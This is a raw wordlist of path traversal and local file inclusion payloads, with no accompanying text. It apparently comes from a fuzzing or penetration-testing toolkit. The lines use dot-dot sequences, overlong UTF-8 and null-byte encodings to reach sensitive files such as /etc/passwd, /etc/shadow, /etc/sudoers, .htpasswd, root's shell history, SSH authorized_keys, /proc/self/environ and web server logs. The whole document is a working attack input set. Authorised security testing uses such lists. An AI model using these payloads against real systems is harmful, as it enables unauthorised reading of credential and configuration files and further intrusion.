..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
||||
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
||||
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
||||
c:\apache\logs\access.log
|
||||
c:\apache\logs\error.log
|
||||
c:\AppServ\MySQL
|
||||
C:/boot.ini
|
||||
C:\boot.ini
|
||||
/C:/inetpub/ftproot/
|
||||
C:/inetpub/wwwroot/global.asa
|
||||
C:\inetpub\wwwroot\global.asa
|
||||
c:\inetpub\wwwroot\index.asp
|
||||
/config.asp
|
||||
../config.asp
|
||||
config.asp
|
||||
../config.inc.php
|
||||
config.inc.php
|
||||
../config.js
|
||||
config.js
|
||||
_config.php
|
||||
../_config.php
|
||||
../config.php
|
||||
config.php
|
||||
../_config.php%00
|
||||
../../../../../../../../conf/server.xml
|
||||
/core/config.php
|
||||
/C:\Program Files\
|
||||
c:\Program Files\Apache Group\Apache\logs\access.log
|
||||
c:\Program Files\Apache Group\Apache\logs\error.log
|
||||
/.cshrc
|
||||
c:\System32\Inetsrv\metabase.xml
|
||||
c:WINDOWS/system32/
|
||||
d:\AppServ\MySQL
|
||||
database.asp
|
||||
database.js
|
||||
database.php
|
||||
data.php
|
||||
dbase.php a
|
||||
db.php
|
||||
../../../../../../../dev
|
||||
/D:\Program Files\
|
||||
d:\System32\Inetsrv\metabase.xml
|
||||
/etc/apache2/apache2.conf
|
||||
/etc/apache2/conf/httpd.conf
|
||||
/etc/apache2/httpd.conf
|
||||
/etc/apache2/sites-available/default
|
||||
/etc/apache2/vhosts.d/default_vhost.include
|
||||
/etc/apache/apache.conf
|
||||
/etc/apache/conf/httpd.conf
|
||||
/etc/apache/httpd.conf
|
||||
/etc/apt/sources.list
|
||||
/etc/chrootUsers
|
||||
/etc/crontab
|
||||
/etc/defaultdomain
|
||||
/etc/default/passwd
|
||||
/etc/defaultrouter
|
||||
/etc/fstab
|
||||
/etc/ftpchroot
|
||||
/etc/ftphosts
|
||||
/etc/group
|
||||
/etc/hostname.bge
|
||||
/etc/hostname.ce0
|
||||
/etc/hostname.ce1
|
||||
/etc/hostname.ce2
|
||||
/etc/hostname.ce3
|
||||
/etc/hostname.dcelx0
|
||||
/etc/hostname.dcelx1
|
||||
/etc/hostname.dcelx2
|
||||
/etc/hostname.dcelx3
|
||||
/etc/hostname.dmfe0
|
||||
/etc/hostname.dmfe1
|
||||
/etc/hostname.dmfe2
|
||||
/etc/hostname.dmfe3
|
||||
/etc/hostname.dnet0
|
||||
/etc/hostname.dnet1
|
||||
/etc/hostname.dnet2
|
||||
/etc/hostname.dnet3
|
||||
/etc/hostname.ecn0
|
||||
/etc/hostname.ecn1
|
||||
/etc/hostname.ecn2
|
||||
/etc/hostname.ecn3
|
||||
/etc/hostname.elx0
|
||||
/etc/hostname.elx1
|
||||
/etc/hostname.elx2
|
||||
/etc/hostname.elx3
|
||||
/etc/hostname.elxl0
|
||||
/etc/hostname.elxl1
|
||||
/etc/hostname.elxl2
|
||||
/etc/hostname.elxl3
|
||||
/etc/hostname.eri0
|
||||
/etc/hostname.eri1
|
||||
/etc/hostname.eri2
|
||||
/etc/hostname.eri3
|
||||
/etc/hostname.ge0
|
||||
/etc/hostname.ge1
|
||||
/etc/hostname.ge2
|
||||
/etc/hostname.ge3
|
||||
/etc/hostname.hme0
|
||||
/etc/hostname.hme1
|
||||
/etc/hostname.hme2
|
||||
/etc/hostname.hme3
|
||||
/etc/hostname.ieef0
|
||||
/etc/hostname.ieef1
|
||||
/etc/hostname.ieef2
|
||||
/etc/hostname.ieef3
|
||||
/etc/hostname.iprb0
|
||||
/etc/hostname.iprb1
|
||||
/etc/hostname.iprb2
|
||||
/etc/hostname.iprb3
|
||||
/etc/hostname.le0
|
||||
/etc/hostname.le1
|
||||
/etc/hostname.le2
|
||||
/etc/hostname.le3
|
||||
/etc/hostname.lo
|
||||
/etc/hostname.pcn0
|
||||
/etc/hostname.pcn1
|
||||
/etc/hostname.pcn2
|
||||
/etc/hostname.pcn3
|
||||
/etc/hostname.qfe0
|
||||
/etc/hostname.qfe1
|
||||
/etc/hostname.qfe2
|
||||
/etc/hostname.qfe3
|
||||
/etc/hostname.spwr0
|
||||
/etc/hostname.spwr1
|
||||
/etc/hostname.spwr2
|
||||
/etc/hostname.spwr3
|
||||
/etc/hosts
|
||||
../../../../../../../../../../../../etc/hosts
|
||||
../../../../../../../../../../../../etc/hosts%00
|
||||
/etc/hosts.allow
|
||||
/etc/hosts.deny
|
||||
/etc/hosts.equiv
|
||||
/etc/http/conf/httpd.conf
|
||||
/etc/httpd.conf
|
||||
/etc/httpd/conf.d/php.conf
|
||||
/etc/httpd/conf.d/squirrelmail.conf
|
||||
/etc/httpd/conf.d/ssl.conf
|
||||
/etc/httpd/conf/httpd.conf
|
||||
/etc/httpd/httpd.conf
|
||||
/etc/httpd/logs/acces_log
|
||||
/etc/httpd/logs/acces.log
|
||||
../../../../../../../etc/httpd/logs/acces_log
|
||||
../../../../../../../etc/httpd/logs/acces.log
|
||||
/etc/httpd/logs/access_log
|
||||
/etc/httpd/logs/access.log
|
||||
../../../../../etc/httpd/logs/access_log
|
||||
../../../../../etc/httpd/logs/access.log
|
||||
/etc/httpd/logs/error_log
|
||||
/etc/httpd/logs/error.log
|
||||
../../../../../../../etc/httpd/logs/error_log
|
||||
../../../../../../../etc/httpd/logs/error.log
|
||||
../../../../../etc/httpd/logs/error_log
|
||||
../../../../../etc/httpd/logs/error.log
|
||||
/etc/httpd/php.ini
|
||||
/etc/http/httpd.conf
|
||||
/etc/inetd.conf
|
||||
/etc/init.d/apache
|
||||
/etc/init.d/apache2
|
||||
/etc/issue
|
||||
/etc/logrotate.d/ftp
|
||||
/etc/logrotate.d/httpd
|
||||
/etc/logrotate.d/proftpd
|
||||
/etc/logrotate.d/vsftpd.log
|
||||
/etc/mail/access
|
||||
/etc/mailman/mm_cfg.py
|
||||
/etc/make.conf
|
||||
/etc/master.passwd
|
||||
/etc/motd
|
||||
/etc/my.cnf
|
||||
/etc/mysql/my.cnf
|
||||
/etc/netconfig
|
||||
/etc/nsswitch.conf
|
||||
/etc/opt/ipf/ipf.conf
|
||||
/etc/opt/ipf/ipnat.conf
|
||||
/./././././././././././etc/passwd
|
||||
/../../../../../../../../../../etc/passwd
|
||||
/../../../../../../../../../../etc/passwd^^
|
||||
/..\../..\../..\../..\../..\../..\../etc/passwd
|
||||
/etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../etc/passwd
|
||||
../../../../../../../../etc/passwd
|
||||
../../../../../../../etc/passwd
|
||||
../../../../../../etc/passwd
|
||||
../../../../../etc/passwd
|
||||
../../../../etc/passwd
|
||||
../../../etc/passwd
|
||||
../../etc/passwd
|
||||
../etc/passwd
|
||||
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||
etc/passwd
|
||||
/etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../etc/passwd%00
|
||||
../../../../../../../etc/passwd%00
|
||||
../../../../../../etc/passwd%00
|
||||
../../../../../etc/passwd%00
|
||||
../../../../etc/passwd%00
|
||||
../../../etc/passwd%00
|
||||
../../etc/passwd%00
|
||||
../etc/passwd%00
|
||||
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||
/../../../../../../../../../../../etc/passwd%00.html
|
||||
/../../../../../../../../../../../etc/passwd%00.jpg
|
||||
../../../../../../etc/passwd&=%3C%3C%3C%3C
|
||||
/etc/php4.4/fcgi/php.ini
|
||||
/etc/php4/apache2/php.ini
|
||||
/etc/php4/apache/php.ini
|
||||
/etc/php4/cgi/php.ini
|
||||
/etc/php5/apache2/php.ini
|
||||
/etc/php5/apache/php.ini
|
||||
/etc/php5/cgi/php.ini
|
||||
/etc/php/apache2/php.ini
|
||||
/etc/php/apache/php.ini
|
||||
/etc/php/cgi/php.ini
|
||||
/etc/php.d/dom.ini
|
||||
/etc/php.d/gd.ini
|
||||
/etc/php.d/imap.ini
|
||||
/etc/php.d/json.ini
|
||||
/etc/php.d/ldap.ini
|
||||
/etc/php.d/mbstring.ini
|
||||
/etc/php.d/mysqli.ini
|
||||
/etc/php.d/mysql.ini
|
||||
/etc/php.d/odbc.ini
|
||||
/etc/php.d/pdo.ini
|
||||
/etc/php.d/pdo_mysql.ini
|
||||
/etc/php.d/pdo_odbc.ini
|
||||
/etc/php.d/pdo_pgsql.ini
|
||||
/etc/php.d/pdo_sqlite.ini
|
||||
/etc/php.d/pgsql.ini
|
||||
/etc/php.d/xmlreader.ini
|
||||
/etc/php.d/xmlwriter.ini
|
||||
/etc/php.d/xsl.ini
|
||||
/etc/php.d/zip.ini
|
||||
/etc/php.ini
|
||||
/etc/php/php4/php.ini
|
||||
/etc/php/php.ini
|
||||
/etc/postfix/mydomains
|
||||
/etc/proftp.conf
|
||||
/etc/proftpd/modules.conf
|
||||
/etc/protpd/proftpd.conf
|
||||
/etc/pure-ftpd.conf
|
||||
/etc/pureftpd.passwd
|
||||
/etc/pureftpd.pdb
|
||||
/etc/pure-ftpd/pure-ftpd.conf
|
||||
/etc/pure-ftpd/pure-ftpd.pdb
|
||||
/etc/pure-ftpd/pureftpd.pdb
|
||||
/etc/release
|
||||
/etc/resolv.conf
|
||||
/etc/rpc
|
||||
/etc/security/environ
|
||||
/etc/security/failedlogin
|
||||
/etc/security/group
|
||||
/etc/security/lastlog
|
||||
/etc/security/limits
|
||||
/etc/security/passwd
|
||||
/etc/security/user
|
||||
/./././././././././././etc/shadow
|
||||
/../../../../../../../../../../etc/shadow
|
||||
/../../../../../../../../../../etc/shadow^^
|
||||
/..\../..\../..\../..\../..\../..\../etc/shadow
|
||||
/etc/shadow
|
||||
../../../../../../../../../../../../etc/shadow
|
||||
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
|
||||
../../../../../../../../../../../../etc/shadow%00
|
||||
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||
etc/shadow%00
|
||||
/etc/ssh/sshd_config
|
||||
/etc/sudoers
|
||||
/etc/syslog.conf
|
||||
/etc/syslogd.conf
|
||||
/etc/system
|
||||
/etc/updatedb.conf
|
||||
/etc/utmp
|
||||
/etc/vfstab
|
||||
/etc/vhcs2/proftpd/proftpd.conf
|
||||
/etc/vsftpd.chroot_list
|
||||
/etc/vsftpd.conf
|
||||
/etc/vsftpd/vsftpd.conf
|
||||
/etc/wtmp
|
||||
/etc/wu-ftpd/ftpaccess
|
||||
/etc/wu-ftpd/ftphosts
|
||||
/etc/wu-ftpd/ftpusers
|
||||
/.forward
|
||||
/home2\bin\stable\apache\php.ini
|
||||
/home/apache/conf/httpd.conf
|
||||
/home/apache/httpd.conf
|
||||
/home\bin\stable\apache\php.ini
|
||||
/.htpasswd
|
||||
.htpasswd
|
||||
../.htpasswd
|
||||
../install.php
|
||||
install.php
|
||||
../../../../../../../../../../../../localstart.asp
|
||||
../../../../../../../../../../../../localstart.asp%00
|
||||
/log/miscDir/accesslog
|
||||
/.logout
|
||||
/logs/access_log
|
||||
/logs/access.log
|
||||
../../../../../logs/access.log
|
||||
../../../../logs/access.log
|
||||
../../../logs/access.log
|
||||
../../logs/access.log
|
||||
../logs/access.log
|
||||
/logs/error_log
|
||||
/logs/error.log
|
||||
../../../../../logs/error.log
|
||||
../../../../logs/error.log
|
||||
../../../logs/error.log
|
||||
../../logs/error.log
|
||||
../logs/error.log
|
||||
/logs/pure-ftpd.log
|
||||
/master.passwd
|
||||
member/.htpasswd
|
||||
members/.htpasswd
|
||||
/.netrc
|
||||
/NetServer\bin\stable\apache\php.ini
|
||||
/opt/apache2/conf/httpd.conf
|
||||
/opt/apache/conf/httpd.conf
|
||||
/opt/lampp/logs/access_log
|
||||
/opt/lampp/logs/access.log
|
||||
/opt/lampp/logs/error_log
|
||||
/opt/lampp/logs/error.log
|
||||
/opt/xampp/etc/php.ini
|
||||
/opt/xampp/logs/access_log
|
||||
/opt/xampp/logs/access.log
|
||||
/opt/xampp/logs/error_log
|
||||
/opt/xampp/logs/error.log
|
||||
.pass
|
||||
../.pass
|
||||
pass.dat
|
||||
passwd
|
||||
/.passwd
|
||||
.passwd
|
||||
../.passwd
|
||||
passwd.dat
|
||||
/php4\php.ini
|
||||
/php5\php.ini
|
||||
/php\php.ini
|
||||
/PHP\php.ini
|
||||
/private/etc/httpd/httpd.conf
|
||||
/private/etc/httpd/httpd.conf.default
|
||||
/proc/cpuinfo
|
||||
/proc/interrupts
|
||||
/proc/loadavg
|
||||
/proc/meminfo
|
||||
/proc/mounts
|
||||
/proc/net/arp
|
||||
/proc/net/dev
|
||||
/proc/net/route
|
||||
/proc/net/tcp
|
||||
/proc/partitions
|
||||
/proc/self/cmdline
|
||||
/proc/self/envron
|
||||
/proc/version
|
||||
/.profile
|
||||
/Program Files\Apache Group\Apache2\conf\httpd.conf
|
||||
/Program Files\Apache Group\Apache\conf\httpd.conf
|
||||
/Program Files\Apache Group\Apache\logs\access.log
|
||||
/Program Files\Apache Group\Apache\logs\error.log
|
||||
/Program Files\xampp\apache\conf\httpd.conf
|
||||
/../../../../pswd
|
||||
/.rhosts
|
||||
/root/.bash_history
|
||||
/root/.bash_logut
|
||||
root/.htpasswd
|
||||
/root/.ksh_history
|
||||
/root/.Xauthority
|
||||
/.sh_history
|
||||
/.shosts
|
||||
/.ssh/authorized_keys
|
||||
user/.htpasswd
|
||||
../users.db.php
|
||||
users.db.php
|
||||
users/.htpasswd
|
||||
/usr/apache2/conf/httpd.conf
|
||||
/usr/apache/conf/httpd.conf
|
||||
/usr/etc/pure-ftpd.conf
|
||||
/usr/lib/cron/log
|
||||
/usr/lib/php.ini
|
||||
/usr/lib/php/php.ini
|
||||
/usr/lib/security/mkuser.default
|
||||
/usr/local/apache2/conf/httpd.conf
|
||||
/usr/local/apache2/httpd.conf
|
||||
/usr/local/apache2/logs/access_log
|
||||
/usr/local/apache2/logs/access.log
|
||||
/usr/local/apache2/logs/error_log
|
||||
/usr/local/apache2/logs/error.log
|
||||
/usr/local/apache/conf/httpd.conf
|
||||
/usr/local/apache/conf/php.ini
|
||||
/usr/local/apache/httpd.conf
|
||||
/usr/local/apache/log
|
||||
/usr/local/apache/logs
|
||||
/usr/local/apache/logs/access_log
|
||||
/usr/local/apache/logs/access_ log
|
||||
/usr/local/apache/logs/access.log
|
||||
/usr/local/apache/logs/access. log
|
||||
../../../../../../../usr/local/apache/logs/access_ log
|
||||
../../../../../../../usr/local/apache/logs/access. log
|
||||
../../../../../usr/local/apache/logs/access_log
|
||||
../../../../../usr/local/apache/logs/access.log
|
||||
/usr/local/apache/logs/error_log
|
||||
/usr/local/apache/logs/error.log
|
||||
../../../../../../../usr/local/apache/logs/error_l og
|
||||
../../../../../../../usr/local/apache/logs/error.l og
|
||||
../../../../../usr/local/apache/logs/error_log
|
||||
../../../../../usr/local/apache/logs/error.log
|
||||
/usr/local/apps/apache2/conf/httpd.conf
|
||||
/usr/local/apps/apache/conf/httpd.conf
|
||||
/usr/local/cpanel/logs
|
||||
/usr/local/cpanel/logs/access_log
|
||||
/usr/local/cpanel/logs/error_log
|
||||
/usr/local/cpanel/logs/license_log
|
||||
/usr/local/cpanel/logs/login_log
|
||||
/usr/local/cpanel/logs/stats_log
|
||||
/usr/local/etc/apache2/conf/httpd.conf
|
||||
/usr/local/etc/apache/conf/httpd.conf
|
||||
/usr/local/etc/apache/vhosts.conf
|
||||
/usr/local/etc/httpd/conf/httpd.conf
|
||||
/usr/local/etc/httpd/logs/access_log
|
||||
/usr/local/etc/httpd/logs/error_log
|
||||
/usr/local/etc/php.ini
|
||||
/usr/local/etc/pure-ftpd.conf
|
||||
/usr/local/etc/pureftpd.pdb
|
||||
/usr/local/httpd/conf/httpd.conf
|
||||
/usr/local/lib/php.ini
|
||||
/usr/local/php4/httpd.conf
|
||||
/usr/local/php4/httpd.conf.php
|
||||
/usr/local/php4/lib/php.ini
|
||||
/usr/local/php5/httpd.conf
|
||||
/usr/local/php5/httpd.conf.php
|
||||
/usr/local/php5/lib/php.ini
|
||||
/usr/local/php/httpd.conf
|
||||
/usr/local/php/httpd.conf.php
|
||||
/usr/local/php/lib/php.ini
|
||||
/usr/local/pureftpd/etc/pure-ftpd.conf
|
||||
/usr/local/pureftpd/etc/pureftpd.pdb
|
||||
/usr/local/pureftpd/sbin/pure-config.pl
|
||||
/usr/local/www/logs/thttpd_log
|
||||
/usr/local/Zend/etc/php.ini
|
||||
/usr/pkgsrc/net/pureftpd/
|
||||
/usr/ports/contrib/pure-ftpd/
|
||||
/usr/ports/ftp/pure-ftpd/
|
||||
/usr/ports/net/pure-ftpd/
|
||||
/usr/sbin/pure-config.pl
|
||||
/usr/spool/lp/log
|
||||
/usr/spool/mqueue/syslog
|
||||
/var/adm
|
||||
/var/adm/acct/sum/loginlog
|
||||
/var/adm/aculog
|
||||
/var/adm/aculogs
|
||||
/var/adm/crash/unix
|
||||
/var/adm/crash/vmcore
|
||||
/var/adm/cron/log
|
||||
/var/adm/dtmp
|
||||
/var/adm/lastlog
|
||||
/var/adm/lastlog/username
|
||||
/var/adm/log/asppp.log
|
||||
/var/adm/loginlog
|
||||
/var/adm/log/xferlog
|
||||
/var/adm/lp/lpd-errs
|
||||
/var/adm/messages
|
||||
/var/adm/pacct
|
||||
/var/adm/qacct
|
||||
/var/adm/ras/bootlog
|
||||
/var/adm/ras/errlog
|
||||
/var/adm/sulog
|
||||
/var/adm/SYSLOG
|
||||
/var/adm/utmp
|
||||
/var/adm/utmpx
|
||||
/var/adm/vold.log
|
||||
/var/adm/wtmp
|
||||
/var/adm/wtmpx
|
||||
/var/adm/X0msgs
|
||||
/var/apache/log
|
||||
/var/apache/logs
|
||||
/var/apache/logs/access_log
|
||||
/var/apache/logs/error_log
|
||||
/var/cpanel/cpanel.config
|
||||
/var/cron/log
|
||||
/var/lib/mlocate/mlocate.db
|
||||
/var/lib/mysql/my.cnf
|
||||
/var/local/www/conf/php.ini
|
||||
/var/lock/samba
|
||||
/var/log
|
||||
/var/log/access_log
|
||||
/var/log/access.log
|
||||
../../../../../../../var/log/access_log
|
||||
../../../../../../../var/log/access.log
|
||||
../../../../../var/log/access_log
|
||||
/var/log/acct
|
||||
/var/log/apache2/access_log
|
||||
/var/log/apache2/access.log
|
||||
../../../../../../../var/log/apache2/access_log
|
||||
../../../../../../../var/log/apache2/access.log
|
||||
/var/log/apache2/error_log
|
||||
/var/log/apache2/error.log
|
||||
../../../../../../../var/log/apache2/error_log
|
||||
../../../../../../../var/log/apache2/error.log
|
||||
/var/log/apache/access_log
|
||||
/var/log/apache/access.log
|
||||
../../../../../../../var/log/apache/access_log
|
||||
../../../../../../../var/log/apache/access.log
|
||||
../../../../../var/log/apache/access_log
|
||||
../../../../../var/log/apache/access.log
|
||||
/var/log/apache/error_log
|
||||
/var/log/apache/error.log
|
||||
../../../../../../../var/log/apache/error_log
|
||||
../../../../../../../var/log/apache/error.log
|
||||
../../../../../var/log/apache/error_log
|
||||
../../../../../var/log/apache/error.log
|
||||
/var/log/apache-ssl/access.log
|
||||
/var/log/apache-ssl/error.log
|
||||
/var/log/auth
|
||||
/var/log/authlog
|
||||
/var/log/auth.log
|
||||
/var/log/boot.log
|
||||
/var/log/cron.log
|
||||
/var/log/dmesg
|
||||
/var/log/error_log
|
||||
/var/log/error.log
|
||||
../../../../../../../var/log/error_log
|
||||
../../../../../../../var/log/error.log
|
||||
../../../../../var/log/error_log
|
||||
/var/log/exim_mainlog
|
||||
/var/log/exim/mainlog
|
||||
/var/log/exim_paniclog
|
||||
/var/log/exim/paniclog
|
||||
/var/log/exim_rejectlog
|
||||
/var/log/exim/rejectlog
|
||||
/var/log/ftplog
|
||||
/var/log/ftp-proxy
|
||||
/var/log/ftp-proxy/ftp-proxy.log
|
||||
/var/log/httpd/
|
||||
/var/log/httpd/access_log
|
||||
/var/log/httpd/access.log
|
||||
../../../../../var/log/httpd/access_log
|
||||
/var/log/httpd/error_log
|
||||
/var/log/httpd/error.log
|
||||
../../../../../var/log/httpd/error_log
|
||||
/var/log/httpsd/ssl.access_log
|
||||
/var/log/httpsd/ssl_log
|
||||
/var/log/kern.log
|
||||
/var/log/lastlog
|
||||
/var/log/lighttpd
|
||||
/var/log/maillog
|
||||
/var/log/message
|
||||
/var/log/messages
|
||||
/var/log/mysqlderror.log
|
||||
/var/log/mysqld.log
|
||||
/var/log/mysql.log
|
||||
/var/log/mysql/mysql-bin.log
|
||||
/var/log/mysql/mysql.log
|
||||
/var/log/mysql/mysql-slow.log
|
||||
/var/log/ncftpd.errs
|
||||
/var/log/ncftpd/misclog.txt
|
||||
/var/log/news
|
||||
/var/log/news.all
|
||||
/var/log/news/news
|
||||
/var/log/news/news.all
|
||||
/var/log/news/news.crit
|
||||
/var/log/news/news.err
|
||||
/var/log/news/news.notice
|
||||
/var/log/news/suck.err
|
||||
/var/log/news/suck.notice
|
||||
/var/log/poplog
|
||||
/var/log/POPlog
|
||||
/var/log/proftpd
|
||||
/var/log/proftpd.access_log
|
||||
/var/log/proftpd.xferlog
|
||||
/var/log/proftpd/xferlog.legacy
|
||||
/var/log/pureftpd.log
|
||||
/var/log/pure-ftpd/pure-ftpd.log
|
||||
/var/log/qmail
|
||||
/var/log/qmail/
|
||||
/var/log/samba
|
||||
/var/log/samba-log.%m
|
||||
/var/log/secure
|
||||
/var/log/smtpd
|
||||
/var/log/spooler
|
||||
/var/log/syslog
|
||||
/var/log/telnetd
|
||||
/var/log/thttpd_log
|
||||
/var/log/utmp
|
||||
/var/log/vsftpd.log
|
||||
/var/log/wtmp
|
||||
/var/log/xferlog
|
||||
/var/log/yum.log
|
||||
/var/lp/logs/lpNet
|
||||
/var/lp/logs/lpsched
|
||||
/var/lp/logs/requests
|
||||
/var/mysql.log
|
||||
/var/run/httpd.pid
|
||||
/var/run/mysqld/mysqld.pid
|
||||
/var/run/utmp
|
||||
/var/saf/_log
|
||||
/var/saf/port/log
|
||||
/var/spool/errors
|
||||
/var/spool/locks
|
||||
/var/spool/logs
|
||||
/var/spool/tmp
|
||||
/var/www/conf/httpd.conf
|
||||
/var/www/html/.htaccess
|
||||
/var/www/localhost/htdocs/.htaccess
|
||||
/var/www/log/access_log
|
||||
/var/www/log/error_log
|
||||
/../../var/www/logs/access_log
|
||||
/var/www/logs/access_log
|
||||
/var/www/logs/access.log
|
||||
../../../../../../../var/www/logs/access_log
|
||||
../../../../../../../var/www/logs/access.log
|
||||
../../../../../var/www/logs/access.log
|
||||
/var/www/logs/error_log
|
||||
/var/www/logs/error.log
|
||||
../../../../../../../var/www/logs/error_log
|
||||
../../../../../../../var/www/logs/error.log
|
||||
../../../../../var/www/logs/error_log
|
||||
../../../../../var/www/logs/error.log
|
||||
/var/www/sitename/htdocs/
|
||||
/var/www/vhosts/sitename/httpdocs/.htaccess
|
||||
/var/www/web1/html/.htaccess
|
||||
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
|
||||
/Volumes/webBackup/opt/apache2/conf/httpd.conf
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
|
||||
/web/conf/php.ini
|
||||
/WINDOWS\php.ini
|
||||
../../windows/win.ini
|
||||
/WINNT\php.ini
|
||||
/..\..\..\..\..\..\winnt\win.ini
|
||||
/www/logs/proftpd.system.log
|
||||
/xampp\apache\bin\php.ini
|
||||
/.Xauthority
|
||||
..2fapache2flogs2ferror.log
|
||||
..2fapache2flogs2faccess.log
|
||||
..2f..2fapache2flogs2ferror.log
|
||||
..2f..2fapache2flogs2faccess.log
|
||||
..2f..2f..2fapache2flogs2ferror.log
|
||||
..2f..2f..2fapache2flogs2faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
|
||||
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
|
||||
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
|
||||
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
|
||||
..2fetc2fpasswd
|
||||
..2fetc2fpasswd%00
|
||||
..2f..2fetc2fpasswd
|
||||
..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
